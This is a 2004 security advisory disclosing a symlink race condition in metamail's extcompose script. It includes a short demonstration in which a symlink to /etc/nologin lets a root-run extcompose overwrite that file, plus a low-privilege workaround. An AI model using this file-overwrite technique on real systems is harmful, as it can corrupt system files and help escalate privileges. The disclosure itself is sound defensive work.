~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product:      Extcompose included with the common
              metamail package.
   http://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions:     All
Bug:          Symlink bug / race condition
Impact:       Attacker's can write to arbitrary files,
              and in theory, elevate privileges
Date:         March 11, 2004
Author:       Shaun Colley
              Email: shaunige@yahoo.co.uk
              WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).  

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.  

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a 
properly-equipped  work-station  to  enter  the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included  in the mail message itself 
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user-data, and writes the relevent output to the
file specified by the user on the command-line.  The
extcompose script, unfortunately, does not check for
existance of the output file specified, nor does it
check for the possibility of the filename specified
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose was ran by root, and an
attacker creates a symlink to /etc/nologin, or worse
yet, results could be quite severe.  An example attack
is demonstrated below.

Due to the fact that an attacker must know the
filename specified by the invoking user of extcompose
in order to create the symlink, this could be
considered a race condition (i.e the attacker might
see the unsuspecting user typing the command in an
office environment, and quickly create the symlink
using her terminal).


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
    1 -- In a local file
    2 -- In an AFS file
    3 -- In an anonymous FTP directory on the Internet
    4 -- In an Internet FTP directory that requires a
valid login
    5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
  1 -- No, it is not encoded
  2 -- Yes, it is encoded in base64
  3 -- Yes, it is encoded in quoted-printable
  4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type:  text/plain
Content-transfer-encoding:  base64
###


As demonstrated, extcompose does not safely deal with
file handling, thus presenting possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'.  In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists.  I have attempted to contacted the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.


  
  
    
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping" 
your friends today! Download Messenger Now 
http://uk.messenger.yahoo.com/download/index.html